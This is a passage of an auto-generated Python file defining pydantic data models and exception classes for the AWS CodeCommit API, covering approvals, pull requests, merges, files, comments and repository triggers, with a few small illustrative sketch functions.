class InvalidRepositoryNameException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class EncryptionIntegrityChecksFailedException(
ApprovalRuleTemplateNameRequiredException
):
pass
class EncryptionKeyAccessDeniedException(ApprovalRuleTemplateNameRequiredException):
pass
class EncryptionKeyDisabledException(ApprovalRuleTemplateNameRequiredException):
pass
class EncryptionKeyNotFoundException(ApprovalRuleTemplateNameRequiredException):
pass
class EncryptionKeyUnavailableException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryNamesRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class MaximumRepositoryNamesExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MergeOptionRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidMergeOptionException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidContinuationTokenException(ApprovalRuleTemplateNameRequiredException):
pass
class CommitRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class CommitDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidCommitException(ApprovalRuleTemplateNameRequiredException):
pass
class TipsDivergenceExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidMaxConflictFilesException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidMaxMergeHunksException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidConflictDetailLevelException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidConflictResolutionStrategyException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumFileContentToLoadExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumItemsToCompareExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class CommitIdsListRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class CommitIdsLimitExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalRuleTemplateNameAlreadyExistsException(
ApprovalRuleTemplateNameRequiredException
):
pass
class ApprovalRuleTemplateContentRequiredException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidApprovalRuleTemplateContentException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidApprovalRuleTemplateDescriptionException(
ApprovalRuleTemplateNameRequiredException
):
pass
class NumberOfRuleTemplatesExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class BranchNameRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class BranchNameExistsException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidBranchNameException(ApprovalRuleTemplateNameRequiredException):
pass
class CommitIdRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidCommitIdException(ApprovalRuleTemplateNameRequiredException):
pass
class ParentCommitIdRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidParentCommitIdException(ApprovalRuleTemplateNameRequiredException):
pass
class ParentCommitDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class ParentCommitIdOutdatedException(ApprovalRuleTemplateNameRequiredException):
pass
class BranchDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class BranchNameIsTagNameException(ApprovalRuleTemplateNameRequiredException):
pass
class FileEntryRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class MaximumFileEntriesExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class PutFileEntryConflictException(ApprovalRuleTemplateNameRequiredException):
pass
class SourceFileOrContentRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class FileContentAndSourceFileSpecifiedException(
ApprovalRuleTemplateNameRequiredException
):
pass
class PathRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidPathException(ApprovalRuleTemplateNameRequiredException):
pass
class SamePathRequestException(ApprovalRuleTemplateNameRequiredException):
pass
class FileDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class FileContentSizeLimitExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class FolderContentSizeLimitExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidDeletionParameterException(ApprovalRuleTemplateNameRequiredException):
pass
class RestrictedSourceFileException(ApprovalRuleTemplateNameRequiredException):
pass
class FileModeRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidFileModeException(ApprovalRuleTemplateNameRequiredException):
pass
class NameLengthExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidEmailException(ApprovalRuleTemplateNameRequiredException):
pass
class CommitMessageLengthExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class NoChangeException(ApprovalRuleTemplateNameRequiredException):
pass
class FileNameConflictsWithDirectoryNameException(
ApprovalRuleTemplateNameRequiredException
):
pass
class DirectoryNameConflictsWithFileNameException(
ApprovalRuleTemplateNameRequiredException
):
pass
class FilePathConflictsWithSubmodulePathException(
ApprovalRuleTemplateNameRequiredException
):
pass
class ClientRequestTokenRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidClientRequestTokenException(ApprovalRuleTemplateNameRequiredException):
pass
class IdempotencyParameterMismatchException(ApprovalRuleTemplateNameRequiredException):
pass
class ReferenceNameRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidReferenceNameException(ApprovalRuleTemplateNameRequiredException):
pass
class ReferenceDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class ReferenceTypeNotSupportedException(ApprovalRuleTemplateNameRequiredException):
pass
class TitleRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidTitleException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidDescriptionException(ApprovalRuleTemplateNameRequiredException):
pass
class TargetsRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidTargetsException(ApprovalRuleTemplateNameRequiredException):
pass
class TargetRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidTargetException(ApprovalRuleTemplateNameRequiredException):
pass
class MultipleRepositoriesInPullRequestException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumOpenPullRequestsExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class SourceAndDestinationAreSameException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalRuleNameRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidApprovalRuleNameException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalRuleNameAlreadyExistsException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalRuleContentRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidApprovalRuleContentException(ApprovalRuleTemplateNameRequiredException):
pass
class NumberOfRulesExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class PullRequestDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidPullRequestIdException(ApprovalRuleTemplateNameRequiredException):
pass
class PullRequestIdRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class PullRequestAlreadyClosedException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryNameExistsException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidRepositoryDescriptionException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryLimitExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidTagsMapException(ApprovalRuleTemplateNameRequiredException):
pass
class TooManyTagsException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidSystemTagUsageException(ApprovalRuleTemplateNameRequiredException):
pass
class TagPolicyException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidConflictResolutionException(ApprovalRuleTemplateNameRequiredException):
pass
class ManualMergeRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class MaximumConflictResolutionEntriesExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MultipleConflictResolutionEntriesException(
ApprovalRuleTemplateNameRequiredException
):
pass
class ReplacementTypeRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidReplacementTypeException(ApprovalRuleTemplateNameRequiredException):
pass
class ReplacementContentRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidReplacementContentException(ApprovalRuleTemplateNameRequiredException):
pass
class ConcurrentReferenceUpdateException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalRuleTemplateInUseException(ApprovalRuleTemplateNameRequiredException):
pass
class DefaultBranchCannotBeDeletedException(ApprovalRuleTemplateNameRequiredException):
pass
class CommentDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class CommentIdRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidCommentIdException(ApprovalRuleTemplateNameRequiredException):
pass
class CommentDeletedException(ApprovalRuleTemplateNameRequiredException):
pass
class CannotDeleteApprovalRuleFromTemplateException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidPullRequestEventTypeException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidActorArnException(ApprovalRuleTemplateNameRequiredException):
pass
class ActorDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidMaxResultsException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidRevisionIdException(ApprovalRuleTemplateNameRequiredException):
pass
class RevisionIdRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class RevisionNotCurrentException(ApprovalRuleTemplateNameRequiredException):
pass
class BlobIdRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidBlobIdException(ApprovalRuleTemplateNameRequiredException):
pass
class BlobIdDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class FileTooLargeException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidReactionUserArnException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryNotAssociatedWithPullRequestException(
ApprovalRuleTemplateNameRequiredException
):
pass
class CommitIdDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class PathDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class FolderDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidDestinationCommitSpecifierException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidSourceCommitSpecifierException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidPullRequestStatusException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidAuthorArnException(ApprovalRuleTemplateNameRequiredException):
pass
class AuthorDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidSortByException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidOrderException(ApprovalRuleTemplateNameRequiredException):
pass
class ResourceArnRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidResourceArnException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidTargetBranchException(ApprovalRuleTemplateNameRequiredException):
pass
class TipOfSourceReferenceIsDifferentException(
ApprovalRuleTemplateNameRequiredException
):
pass
class PullRequestApprovalRulesNotSatisfiedException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidOverrideStatusException(ApprovalRuleTemplateNameRequiredException):
pass
class OverrideStatusRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class OverrideAlreadySetException(ApprovalRuleTemplateNameRequiredException):
pass
class CommentContentRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class CommentContentSizeLimitExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidFileLocationException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidRelativeFileVersionEnumException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidFilePositionException(ApprovalRuleTemplateNameRequiredException):
pass
class BeforeCommitIdAndAfterCommitIdAreSameException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidReactionValueException(ApprovalRuleTemplateNameRequiredException):
pass
class ReactionValueRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class ReactionLimitExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class FileContentRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class SameFileContentException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryTriggersListRequiredException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumRepositoryTriggersExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidRepositoryTriggerNameException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidRepositoryTriggerDestinationArnException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidRepositoryTriggerRegionException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidRepositoryTriggerCustomDataException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumBranchesExceededException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidRepositoryTriggerBranchNameException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidRepositoryTriggerEventsException(
ApprovalRuleTemplateNameRequiredException
):
pass
class RepositoryTriggerNameRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class RepositoryTriggerDestinationArnRequiredException(
ApprovalRuleTemplateNameRequiredException
):
pass
class RepositoryTriggerBranchNameListRequiredException(
ApprovalRuleTemplateNameRequiredException
):
pass
class RepositoryTriggerEventsListRequiredException(
ApprovalRuleTemplateNameRequiredException
):
pass
class TagsMapRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class TagKeysListRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidTagKeysListException(ApprovalRuleTemplateNameRequiredException):
pass
class InvalidRuleContentSha256Exception(ApprovalRuleTemplateNameRequiredException):
pass
class CommentNotCreatedByCallerException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalRuleDoesNotExistException(ApprovalRuleTemplateNameRequiredException):
pass
class CannotModifyApprovalRuleFromTemplateException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidApprovalStateException(ApprovalRuleTemplateNameRequiredException):
pass
class ApprovalStateRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
class PullRequestCannotBeApprovedByAuthorException(
ApprovalRuleTemplateNameRequiredException
):
pass
class MaximumNumberOfApprovalsExceededException(
ApprovalRuleTemplateNameRequiredException
):
pass
class InvalidPullRequestStatusUpdateException(
ApprovalRuleTemplateNameRequiredException
):
pass
class PullRequestStatusRequiredException(ApprovalRuleTemplateNameRequiredException):
pass
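# Note on the classes above: datamodel-codegen collapses every CodeCommit error
# shape to the same `__root__: Any` payload, so each exception model simply
# subclasses ApprovalRuleTemplateNameRequiredException. A small sketch of what
# that means in practice (the payload dict is a made-up example):
def _error_model_sketch():
    err = RepositoryDoesNotExistException(__root__={'message': 'repo not found'})
    assert isinstance(err, ApprovalRuleTemplateNameRequiredException)
    return err.__root__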
class AccountId(BaseModel):
__root__: str
class AdditionalData(AccountId):
pass
class Arn(AccountId):
pass
class ApprovalState(Enum):
APPROVE = 'APPROVE'
REVOKE = 'REVOKE'
class Approval(BaseModel):
"""
Returns information about a specific approval on a pull request.
"""
userArn: Optional[Arn] = None
approvalState: Optional[ApprovalState] = None
class ApprovalList(BaseModel):
__root__: List[Approval]
class ApprovalRuleId(AccountId):
pass
class ApprovalRuleName(BaseModel):
__root__: Annotated[str, Field(max_length=100, min_length=1)]
class ApprovalRuleContent(BaseModel):
__root__: Annotated[str, Field(max_length=3000, min_length=1)]
class RuleContentSha256(AccountId):
pass
class LastModifiedDate(BaseModel):
__root__: datetime
class CreationDate(LastModifiedDate):
pass
class ApprovalRuleEventMetadata(BaseModel):
"""
Returns information about an event for an approval rule.
"""
approvalRuleName: Optional[ApprovalRuleName] = None
approvalRuleId: Optional[ApprovalRuleId] = None
approvalRuleContent: Optional[ApprovalRuleContent] = None
class RevisionId(AccountId):
pass
class OverrideStatus(Enum):
OVERRIDE = 'OVERRIDE'
REVOKE = 'REVOKE'
class ApprovalRuleOverriddenEventMetadata(BaseModel):
"""
Returns information about an override event for approval rules for a pull request.
"""
revisionId: Optional[RevisionId] = None
overrideStatus: Optional[OverrideStatus] = None
class ApprovalRuleTemplateId(AccountId):
pass
class ApprovalRuleTemplateName(ApprovalRuleName):
pass
class ApprovalRuleTemplateDescription(BaseModel):
__root__: Annotated[str, Field(max_length=1000, min_length=0)]
class ApprovalRuleTemplateContent(ApprovalRuleContent):
pass
class ApprovalRuleTemplate(BaseModel):
"""
Returns information about an approval rule template.
"""
approvalRuleTemplateId: Optional[ApprovalRuleTemplateId] = None
approvalRuleTemplateName: Optional[ApprovalRuleTemplateName] = None
approvalRuleTemplateDescription: Optional[ApprovalRuleTemplateDescription] = None
approvalRuleTemplateContent: Optional[ApprovalRuleTemplateContent] = None
ruleContentSha256: Optional[RuleContentSha256] = None
lastModifiedDate: Optional[LastModifiedDate] = None
creationDate: Optional[CreationDate] = None
lastModifiedUser: Optional[Arn] = None
class ApprovalRuleTemplateNameList(BaseModel):
__root__: List[ApprovalRuleTemplateName]
class ApprovalRulesNotSatisfiedList(BaseModel):
__root__: List[ApprovalRuleName]
class ApprovalRulesSatisfiedList(ApprovalRulesNotSatisfiedList):
pass
class ApprovalStateChangedEventMetadata(BaseModel):
"""
Returns information about a change in the approval state for a pull request.
"""
revisionId: Optional[RevisionId] = None
approvalStatus: Optional[ApprovalState] = None
class Approved(BaseModel):
__root__: bool
class RepositoryName(BaseModel):
__root__: Annotated[str, Field(max_length=100, min_length=1, regex='[\\w\\.-]+')]
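# Sketch of how the constrained __root__ wrapper just above behaves under
# pydantic v1: valid names pass through, while values breaking the declared
# length bounds raise ValidationError. 'demo-repo' is a placeholder name.
def _repository_name_sketch():
    from pydantic import ValidationError  # not imported at module level above
    ok = RepositoryName(__root__='demo-repo')  # satisfies [\w\.-]+ and the length bounds
    try:
        RepositoryName(__root__='')  # violates min_length=1
    except ValidationError:
        pass
    return ok.__root__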
class ErrorCode(AccountId):
pass
class ErrorMessage(AccountId):
pass
class BatchAssociateApprovalRuleTemplateWithRepositoriesError(BaseModel):
"""
Returns information about errors in a BatchAssociateApprovalRuleTemplateWithRepositories operation.
"""
repositoryName: Optional[RepositoryName] = None
errorCode: Optional[ErrorCode] = None
errorMessage: Optional[ErrorMessage] = None
class BatchAssociateApprovalRuleTemplateWithRepositoriesErrorsList(BaseModel):
__root__: List[BatchAssociateApprovalRuleTemplateWithRepositoriesError]
class RepositoryNameList(BaseModel):
__root__: List[RepositoryName]
class Path(AccountId):
pass
class ExceptionName(AccountId):
pass
class Message(AccountId):
pass
class BatchDescribeMergeConflictsError(BaseModel):
"""
Returns information about errors in a BatchDescribeMergeConflicts operation.
"""
filePath: Path
exceptionName: ExceptionName
message: Message
class BatchDescribeMergeConflictsErrors(BaseModel):
__root__: List[BatchDescribeMergeConflictsError]
class CommitName(AccountId):
pass
class MergeOptionTypeEnum(Enum):
FAST_FORWARD_MERGE = 'FAST_FORWARD_MERGE'
SQUASH_MERGE = 'SQUASH_MERGE'
THREE_WAY_MERGE = 'THREE_WAY_MERGE'
class MaxResults(BaseModel):
__root__: int
class FilePaths(BaseModel):
__root__: List[Path]
class ConflictDetailLevelTypeEnum(Enum):
FILE_LEVEL = 'FILE_LEVEL'
LINE_LEVEL = 'LINE_LEVEL'
class ConflictResolutionStrategyTypeEnum(Enum):
NONE = 'NONE'
ACCEPT_SOURCE = 'ACCEPT_SOURCE'
ACCEPT_DESTINATION = 'ACCEPT_DESTINATION'
AUTOMERGE = 'AUTOMERGE'
class NextToken(AccountId):
pass
class ObjectId(AccountId):
pass
class BatchDisassociateApprovalRuleTemplateFromRepositoriesError(
BatchAssociateApprovalRuleTemplateWithRepositoriesError
):
"""
Returns information about errors in a BatchDisassociateApprovalRuleTemplateFromRepositories operation.
"""
pass
class BatchDisassociateApprovalRuleTemplateFromRepositoriesErrorsList(BaseModel):
__root__: List[BatchDisassociateApprovalRuleTemplateFromRepositoriesError]
class BatchGetCommitsError(BaseModel):
"""
Returns information about errors in a BatchGetCommits operation.
"""
commitId: Optional[ObjectId] = None
errorCode: Optional[ErrorCode] = None
errorMessage: Optional[ErrorMessage] = None
class BatchGetCommitsErrorsList(BaseModel):
__root__: List[BatchGetCommitsError]
class CommitIdsInputList(BaseModel):
__root__: List[ObjectId]
class RepositoryNotFoundList(RepositoryNameList):
pass
class Mode(AccountId):
pass
class BlobMetadata(BaseModel):
"""
Returns information about a specific Git blob object.
"""
blobId: Optional[ObjectId] = None
path: Optional[Path] = None
mode: Optional[Mode] = None
class BranchName(BaseModel):
__root__: Annotated[str, Field(max_length=256, min_length=1)]
class CommitId(AccountId):
pass
class BranchInfo(BaseModel):
"""
Returns information about a branch.
"""
branchName: Optional[BranchName] = None
commitId: Optional[CommitId] = None
class BranchNameList(BaseModel):
__root__: List[BranchName]
class ReactionValue(AccountId):
pass
class CallerReactions(BaseModel):
__root__: List[ReactionValue]
class CapitalBoolean(Approved):
pass
class ChangeTypeEnum(Enum):
A = 'A'
M = 'M'
D = 'D'
class ClientRequestToken(AccountId):
pass
class CloneUrlHttp(AccountId):
pass
class CloneUrlSsh(AccountId):
pass
class CommentId(AccountId):
pass
class Content(AccountId):
pass
class IsCommentDeleted(Approved):
pass
class ReactionCountsMap(BaseModel):
pass
class Config:
extra = Extra.allow
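# Sketch: ReactionCountsMap declares no fields but allows arbitrary extras, so it
# behaves like an open mapping of reaction value -> count (the keys below are
# made-up examples, not the actual CodeCommit reaction values).
def _reaction_counts_sketch():
    counts = ReactionCountsMap(THUMBSUP=2, HEART=1)
    return counts.dict()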
class Comment(BaseModel):
"""
Returns information about a specific comment.
"""
commentId: Optional[CommentId] = None
content: Optional[Content] = None
inReplyTo: Optional[CommentId] = None
creationDate: Optional[CreationDate] = None
lastModifiedDate: Optional[LastModifiedDate] = None
authorArn: Optional[Arn] = None
deleted: Optional[IsCommentDeleted] = None
clientRequestToken: Optional[ClientRequestToken] = None
callerReactions: Optional[CallerReactions] = None
reactionCounts: Optional[ReactionCountsMap] = None
class Comments(BaseModel):
__root__: List[Comment]
class PullRequestId(AccountId):
pass
class ParentList(CommitIdsInputList):
pass
class NumberOfConflicts(MaxResults):
pass
class IsBinaryFile(BaseModel):
"""
Information about whether a file is binary or textual in a merge or pull request operation.
"""
source: Optional[CapitalBoolean] = None
destination: Optional[CapitalBoolean] = None
base: Optional[CapitalBoolean] = None
class IsContentConflict(Approved):
pass
class IsFileModeConflict(Approved):
pass
class IsObjectTypeConflict(Approved):
pass
class MergeOperations(BaseModel):
"""
Information about the file operation conflicts in a merge operation.
"""
source: Optional[ChangeTypeEnum] = None
destination: Optional[ChangeTypeEnum] = None
class Count(MaxResults):
pass
class Name(AccountId):
pass
class Email(AccountId):
pass
class KeepEmptyFolders(Approved):
pass
class Title(BaseModel):
__root__: Annotated[str, Field(max_length=150)]
class Description(BaseModel):
__root__: Annotated[str, Field(max_length=10240)]
class RepositoryDescription(BaseModel):
__root__: Annotated[str, Field(max_length=1000)]
class TagsMap(BaseModel):
pass
class Config:
extra = Extra.allow
class Date(AccountId):
pass
class DeleteFileEntry(BaseModel):
"""
A file that is deleted as part of a commit.
"""
filePath: Path
class RepositoryId(AccountId):
pass
class PullRequestEventType(Enum):
PULL_REQUEST_CREATED = 'PULL_REQUEST_CREATED'
PULL_REQUEST_STATUS_CHANGED = 'PULL_REQUEST_STATUS_CHANGED'
PULL_REQUEST_SOURCE_REFERENCE_UPDATED = 'PULL_REQUEST_SOURCE_REFERENCE_UPDATED'
PULL_REQUEST_MERGE_STATE_CHANGED = 'PULL_REQUEST_MERGE_STATE_CHANGED'
PULL_REQUEST_APPROVAL_RULE_CREATED = 'PULL_REQUEST_APPROVAL_RULE_CREATED'
PULL_REQUEST_APPROVAL_RULE_UPDATED = 'PULL_REQUEST_APPROVAL_RULE_UPDATED'
PULL_REQUEST_APPROVAL_RULE_DELETED = 'PULL_REQUEST_APPROVAL_RULE_DELETED'
PULL_REQUEST_APPROVAL_RULE_OVERRIDDEN = 'PULL_REQUEST_APPROVAL_RULE_OVERRIDDEN'
PULL_REQUEST_APPROVAL_STATE_CHANGED = 'PULL_REQUEST_APPROVAL_STATE_CHANGED'
class Difference(BaseModel):
"""
Returns information about a set of differences for a commit specifier.
"""
beforeBlob: Optional[BlobMetadata] = None
afterBlob: Optional[BlobMetadata] = None
changeType: Optional[ChangeTypeEnum] = None
class DifferenceList(BaseModel):
__root__: List[Difference]
class Overridden(Approved):
pass
class EventDate(LastModifiedDate):
pass
class FileModeTypeEnum(Enum):
EXECUTABLE = 'EXECUTABLE'
NORMAL = 'NORMAL'
SYMLINK = 'SYMLINK'
class File(BaseModel):
"""
Returns information about a file in a repository.
"""
blobId: Optional[ObjectId] = None
absolutePath: Optional[Path] = None
relativePath: Optional[Path] = None
fileMode: Optional[FileModeTypeEnum] = None
class FileContent(BaseModel):
__root__: Annotated[str, Field(max_length=6291456)]
class FileList(BaseModel):
__root__: List[File]
class FileMetadata(BaseModel):
"""
A file to be added, updated, or deleted as part of a commit.
"""
absolutePath: Optional[Path] = None
blobId: Optional[ObjectId] = None
fileMode: Optional[FileModeTypeEnum] = None
class FileSize(MaxResults):
pass
class Folder(BaseModel):
"""
Returns information about a folder in a repository.
"""
treeId: Optional[ObjectId] = None
absolutePath: Optional[Path] = None
relativePath: Optional[Path] = None
class FolderList(BaseModel):
__root__: List[Folder]
class Blob(AccountId):
pass
class Limit(MaxResults):
pass
class ObjectSize(MaxResults):
pass
class IsMergeable(Approved):
pass
class MergeOptions(BaseModel):
__root__: List[MergeOptionTypeEnum]
class RepositoryTriggersConfigurationId(AccountId):
pass
class HunkContent(AccountId):
pass
class IsHunkConflict(Approved):
pass
class IsMerged(Approved):
pass
class IsMove(Approved):
pass
class LineNumber(MaxResults):
pass
class PullRequestStatusEnum(Enum):
OPEN = 'OPEN'
CLOSED = 'CLOSED'
class PullRequestIdList(BaseModel):
__root__: List[PullRequestId]
class SortByEnum(Enum):
repositoryName = 'repositoryName'
lastModifiedDate = 'lastModifiedDate'
class OrderEnum(Enum):
ascending = 'ascending'
descending = 'descending'
class ResourceArn(AccountId):
pass
class Position(MaxResults):
pass
class RelativeFileVersionEnum(Enum):
BEFORE = 'BEFORE'
AFTER = 'AFTER'
class MergeHunkDetail(BaseModel):
"""
Information about the details of a merge hunk that contains a conflict in a merge or pull request operation.
"""
startLine: Optional[LineNumber] = None
endLine: Optional[LineNumber] = None
hunkContent: Optional[HunkContent] = None
class MergeHunk(BaseModel):
"""
Information about merge hunks in a merge or pull request operation.
"""
isConflict: Optional[IsHunkConflict] = None
source: Optional[MergeHunkDetail] = None
destination: Optional[MergeHunkDetail] = None
base: Optional[MergeHunkDetail] = None
class MergeMetadata(BaseModel):
"""
Returns information about a merge or potential merge between a source reference and a destination reference in a pull request.
"""
isMerged: Optional[IsMerged] = None
mergedBy: Optional[Arn] = None
mergeCommitId: Optional[CommitId] = None
mergeOption: Optional[MergeOptionTypeEnum] = None
class ObjectTypeEnum(Enum):
FILE = 'FILE'
DIRECTORY = 'DIRECTORY'
GIT_LINK = 'GIT_LINK'
SYMBOLIC_LINK = 'SYMBOLIC_LINK'
class PullRequestCreatedEventMetadata(BaseModel):
"""
Metadata about the pull request that is used when comparing the pull request source with its destination.
"""
repositoryName: Optional[RepositoryName] = None
sourceCommitId: Optional[CommitId] = None
destinationCommitId: Optional[CommitId] = None
mergeBase: Optional[CommitId] = None
class PullRequestStatusChangedEventMetadata(BaseModel):
"""
Information about a change to the status of a pull request.
"""
pullRequestStatus: Optional[PullRequestStatusEnum] = None
class PullRequestSourceReferenceUpdatedEventMetadata(BaseModel):
"""
Information about an update to the source branch of a pull request.
"""
repositoryName: Optional[RepositoryName] = None
beforeCommitId: Optional[CommitId] = None
afterCommitId: Optional[CommitId] = None
mergeBase: Optional[CommitId] = None
class ReferenceName(AccountId):
pass
class PullRequestTarget(BaseModel):
"""
Returns information about a pull request target.
"""
repositoryName: Optional[RepositoryName] = None
sourceReference: Optional[ReferenceName] = None
destinationReference: Optional[ReferenceName] = None
destinationCommit: Optional[CommitId] = None
sourceCommit: Optional[CommitId] = None
mergeBase: Optional[CommitId] = None
mergeMetadata: Optional[MergeMetadata] = None
class SourceFileSpecifier(BaseModel):
"""
Information about a source file that is part of changes made in a commit.
"""
filePath: Path
isMove: Optional[IsMove] = None
class ReactionEmoji(AccountId):
pass
class ReactionUsersList(BaseModel):
__root__: List[Arn]
class ReactionShortCode(AccountId):
pass
class ReactionUnicode(AccountId):
pass
class ReplacementTypeEnum(Enum):
KEEP_BASE = 'KEEP_BASE'
KEEP_SOURCE = 'KEEP_SOURCE'
KEEP_DESTINATION = 'KEEP_DESTINATION'
USE_NEW_CONTENT = 'USE_NEW_CONTENT'
class RepositoryNameIdPair(BaseModel):
"""
Information about a repository name and ID.
"""
repositoryName: Optional[RepositoryName] = None
repositoryId: Optional[RepositoryId] = None
class RepositoryTriggerName(AccountId):
pass
class RepositoryTriggerCustomData(AccountId):
pass
class RepositoryTriggerEventEnum(Enum):
all = 'all'
updateReference = 'updateReference'
createReference = 'createReference'
deleteReference = 'deleteReference'
class RepositoryTriggerExecutionFailureMessage(AccountId):
pass
class RepositoryTriggerExecutionFailure(BaseModel):
"""
A trigger failed to run.
"""
trigger: Optional[RepositoryTriggerName] = None
failureMessage: Optional[RepositoryTriggerExecutionFailureMessage] = None
class RepositoryTriggerExecutionFailureList(BaseModel):
__root__: List[RepositoryTriggerExecutionFailure]
class RepositoryTriggerNameList(BaseModel):
__root__: List[RepositoryTriggerName]
class SetFileModeEntry(BaseModel):
"""
Information about the file mode changes.
"""
filePath: Path
fileMode: FileModeTypeEnum
class SubModule(BaseModel):
"""
Returns information about a submodule reference in a repository folder.
"""
commitId: Optional[ObjectId] = None
absolutePath: Optional[Path] = None
relativePath: Optional[Path] = None
class SymbolicLink(File):
"""
Returns information about a symbolic link in a repository folder.
"""
pass
class TagKey(BaseModel):
__root__: Annotated[str, Field(max_length=128, min_length=1)]
class TagKeysList(BaseModel):
__root__: List[TagKey]
class TagValue(BaseModel):
